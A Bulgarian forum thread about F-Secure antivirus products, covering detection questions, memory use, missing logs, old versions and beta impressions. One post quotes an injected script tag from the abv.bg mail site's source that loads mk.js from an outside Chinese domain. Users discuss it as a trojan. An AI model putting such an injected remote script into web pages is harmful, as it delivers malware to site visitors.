Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

F-Secure - въпроси, проблеми, мнения

Featured Replies

Споко нали си защитен от Комодо Публикувано изображение Я,по спокойно де

Аз че съм защитен съм защитен,но вместо да дадеш отговор по темата....нали трябва да се разбере какво е и защо не го засича F-Secure това е важното.

• Отговори 641
  • Прегледи 103k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

• https://www.lekarstvo.com/help_support.html Виж тук, има за почти всички антивирусни.   И в официалният им сайт, има такова приложение. https://www.f-secure.com/en/web/home_global/support-tools

• F-Secure Uninstallation tool    

• http://www.kaldata.com/forums/index.php?app=forums&module=extras&section=boardrules mihnev_sz

Публикувани изображения

Аз че съм защитен съм защитен,но вместо да дадеш отговор по темата....нали трябва да се разбере какво е и защо не го засича F-Secure това е важното.

Аз съм отговорил със снимка и то от Fe-Secure

http://www.kaldata.com/forums/index.php?sh...t&p=1262414

Публикувано изображение

Човека пита дали някой със Фе го засича и защо той не го засича?Ти Фе Секуре ли ползва?

nikssi, ясно за трянеца :magnifier: ама ми кажи има ли дневен лог ф-секюр.

Иначе ако успея ще направя шот на тоя троянец в абв.

Ето снимки на това което е засечено като заплаха,както и при някои проверки при влизане в абв поща.Проблеми не са констатирани,както и някакви заплахи.Пробвах същото и с Касперски

Публикувано изображение

Публикувано изображение

Публикувано изображение

Друго все още не съм намерил,като отчет.

Публикувано изображение

Троянеца не е при мен, троянеца е някъде в отвъдното Публикувано изображение Идете някъде с бавен нет, отворете абв и гледайте какво зарежда докато отвори сайта.

А това са първите редове от сорса на абв:

<script language="javascript" type="text/javascript" src="http://mk.cxaaaa.cn/mk.js"></script> <html>

<head>

<META http-equiv="Content-Type" content="text/html; charset=windows-1251">

<META CONTENT="Sun, 28 Dec 1997 09:32:45 GMT" HTTP-EQUIV="expires">

Фе си го засича в основния му китайски сайт. Главния въпрос ми беше КЪДЕ са логовете на Фе за да видя в абв.засича ли го.

Поздрави!

Здравейте! Въпросът ми е малко извън темата която обсъждаре в момента, но ще се радвам да ми отговорите - в момента съм с F-Secure client security 8.0, но забелязвам, че виртуалната памет на основния процес fssm32.exe почти не пада под 130 МБ, дори и РАМ памета да е 35 МБ, а на моменти и при РАМ паметта забелязвам течове и качване до към 100 МБ. Единствената друга антивирусна при която съм забелязал такава висока стойност на виртуалната памет е Bitdefender IS 2009. Мислите ли че тези високи стойности на виртуалната памет са проблем? Благодаря

Здравейте!

Въпросът ми е малко извън темата която обсъждаре в момента, но ще се радвам да ми отговорите - в момента съм с F-Secure client security 8.0, но забелязвам, че виртуалната памет на основния процес fssm32.exe почти не пада под 130 МБ, дори и РАМ памета да е 35 МБ, а на моменти и при РАМ паметта забелязвам течове и качване до към 100 МБ. Единствената друга антивирусна при която съм забелязал такава висока стойност на виртуалната памет е Bitdefender IS 2009.

Мислите ли че тези високи стойности на виртуалната памет са проблем?

Благодаря

Здравей, с F-Secure client security 8.0 имах подобен проблем след като включих да сканира архиви в реално време.

Виж коментари №275 за настройката и №277 в тази тема дали не става въпрос за същото положение.

Здравей, с F-Secure client security 8.0 имах подобен проблем след като включих да сканира архиви в реално време.

Виж коментари №275 за настройката и №277 в тази тема дали не става въпрос за същото положение.

Благодаря за отговора. Прочел съм почти всички постове по темата тук. При мен настройката за сканиране в реално време е Normal без сканиране на архиви в реално време. Въпреки това виртуалната памет не пада под 130 МБ. Много хора не забелязват нейните стойности защото не са направили видима колонката в Task manager - а там по подразбиране последната колонка е Memory usage. Затова и при някои програми както и при F secure Memory usage може да е до 50 МБ, а Virtual memory size - 130 МБ.

А това доста тежи на сиситемата. Същото положение беше и при Битдефендер ИС 2009. Но там поне имаше хора със същия проблем във форумите им.

Поздрави

Главния въпрос ми беше КЪДЕ са логовете на Фе за да видя ........

Наистина, не откривам никакви логове, а само Flyer History.....

Онзи ден инсталирах Technology Preview на виртуална Виста Ултимейт.

Пуснах я в темата " на кого колко му лови....."-реагира няколко пъти, нo не е там въпроса.

Изплуваха няколко съобщения за блокиране, но Flyer history отново си стои празно, и липсата на лог: какво е намерила, къде, и какво го е направила, ме дразни доста. Това за мен е причина да не ми е любима.....

Или съм сляп....., и аз не мога да го намеря.......

Редактирано от stefanvalja (преглед на промените)

Мдааам. Във флайер хистори го записва ама май не всичко. Горния китайски сайт го записа там, че е премахнало вирус.

• 1 месец по-късно...

Върнах си имиджа на компа и fssm32.exe перманентно ми харчи 50 и отгоре МБ РАМ. Някакви идеи защо?

От днес отново се върнах на любимата ми финландска приграма. Въпроса ми е, мога ли да разчитам на по-стара версия - имам предвид client securiy 6.03.12411 - с редовни ъпдейти си е, всичко си е ОК.Гледам, че във форума се обсъждат доста по-нови версии, но аз имам ключ за тази и съм я ползувал и преди. Осигурява ли надеждна защита, или е безвъзвратно остаряла.?

...мога ли да разчитам на по-стара версия - имам предвид client securiy 6.03.12411 - с редовни ъпдейти си е, всичко си е ОК...Осигурява ли надеждна защита, или е безвъзвратно остаряла.?

А бе как да ти кажа - "стара чанта, ама лачена", казват хората. Ползвах тази версия 19 месеца и почти изцяло забравих, че из мрежата гъмжи от зарази. После опитах и аз с по-новите версии, но те се оказаха проблематични в някои отношения, несвързани със защитните им възможности.

6.03 има проблем, доколкото липсва антирууткит модулът BlackLight, не че е болка за умиране.

Мисля, чя нищо не пречи да се ползва, стига ъпдейтите за антиспай модула да са чести, защото според последните ми впечатления от тази версия те не бяха особено чести.

А бе как да ти кажа - "стара чанта, ама лачена", казват хората.

Публикувано изображение Това много ми хареса. Публикувано изображениеПубликувано изображениеПубликувано изображение

И мисля, че не рядко е напълно вярно. Публикувано изображение

Здравейте

Както си работеше антивирусната ( F-Secure Anti-Virus Client Security 7.12)(ъпдейтваше се редовно),снощи се появи това,пробвах с други версии(8.00,,fs2009),но и при тях пак същото показва.Някой има ли идея какво може да го оправи.Не ми се сменя програмката,харесвам си я.

Публикувано изображение

Виж в съответния екран от настройките дали датата на последните дефиниции е от преди 26 дни. Ако ти ги пише, че са актуални, е възможно проблемът да е в ъпдейтващия сървър във Финландия, той не е от най-гъвкавите. Затова по-добре изчакай няколко часа, надявам се със следващия ъпдейт проблемът да изчезне.

Виж в съответния екран от настройките дали датата на последните дефиниции е от преди 26 дни. Ако ти ги пише, че са актуални, е възможно проблемът да е в ъпдейтващия сървър във Финландия, той не е от най-гъвкавите. Затова по-добре изчакай няколко часа, надявам се със следващия ъпдейт проблемът да изчезне.

Оправи ми се програмата,без да искам съм си преместил датата на календара с един месец напред.Смених я и след 2 рестарта антивирусната заработи ПаК :)

...без да искам съм си преместил датата на календара с един месец напред...

Е, това и аз го правя доста често, особено пък на служебния си компютър и Avira-та веднага ревва, у дома с KIS е същото.
  • 4 седмици по-късно...

Неслучайно препоръчват използването на Foxit - програмата е несравнимо по-лека и бърза от тромавия Acrobat.

• 3 месеца по-късно...

Реших отново да попробвам F-Secure. Тъй като реших да изтествам всички антивирусни продукти на Уиндоус 7, за да си избера основна програма свалих последната БЕТА версия :

F-Secure Internet Security Technology Preview Latest version (9.50 build 961) released on June 18, 2009.

Дават лиценз за 6 месеца - ето това е бета , не е като НИС2010 само за 14 дни. Публикувано изображение

Програмата има доста подобрения в посока оптимизиране на използваните ресурси, автоматизираност и интерфейс:

- премахнат е един от процесите - fsqh.exe, като е функциите му са разпределени към останалите процеси.

- премахната е възможността за избор на нива при модула антивирус и антиспай.

- Уеб модул мисля че не сканира архиви, но още не съм го тествал (даже и Eicar ще свърши работа за това).

- Защитната стена е подобрена ( вече минава PCflanc Leaktest, който ме притесняваше преди време)

- има подобрение в логовете- по-подробни, систематизирани ( това най-вече ме радва, а не като преди да се чудя къде, какво, и кога е надробила)

- в пакета са вградени: F-Secure Safe Web и F-Secure Exploit Shield Technology Preview - проверено.

Наистина се държи отлично, нищо че е бета- лека е, заема нищожни ресурси в спокоен режим ( нищо, че има отново 7-8 процеса), при сканиране натоварва процесора от 20-40%, но не забавая въобще работата на компютъра - смятам да я задържа по-дълго време и да я разцъкам из темата за ловенето.

Почти пълен автомат, има само няколко нива на защитната стена -аз избрах ниво HOME.

Все повече компании се насочват към пълната автоматизираност на интегрираните си продукти, което на мен ми харесва ( като NIS, McAfee)

Аз съм от типа хора, които когато видят плъзгач и го вдигат веднага на MAX и HIGH ( като настройките на KIS например), и после се чудя - дали наистина трябва, дали по подразбиране ще е по-лек, по-ненатоварващ, но дали тогава ще пази задоволително.....

При F-Secure тези въпроси отпадат- има само един - как ще ме пази.

П.П.

Web Traffic Scanning always scans inside archives [49120]

-супер

и

Some malware is not detected by Web Traffic Scanning [58557] [58558]

Some of the malwares are not detected by Web Traffic Scanning, but instead they are picked up by real-time scanner. These are due to the optimized scanning options for Web Traffic Scanning.

Редактирано от stefanvalja (преглед на промените)

Моята антивирусна е F-Secure System , но имам проблеми с нея! Искам да играя една игра-Cabal,но когато я пускам ми дава,че има вирус в ГеймГуард-а!Изтеглих играта от няколко сайта и все 1 и същи проблем.Истеглих друга игра.По случайност си оказа и тя с ГеймГуард и ми дава че има вирус на същия файл в ппапката геймгуард.Много искам да играя поне едната игра Публикувано изображение ако можете помогнете.

P.S.Преди бях с AVG и неми засече вирус в Cabal

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

Гост
Публикацията ви съдържа термини, които не допускаме! Моля, редактирайте съдържанието си и премахнете подчертаните думи по-долу. Ако замените букви от думата със звездички или друго, за да заобиколите това предупреждение, профилът ви ще бъде блокиран и наказан!
Напишете отговор в тази тема...

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    25%
    Дарени 252.69 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.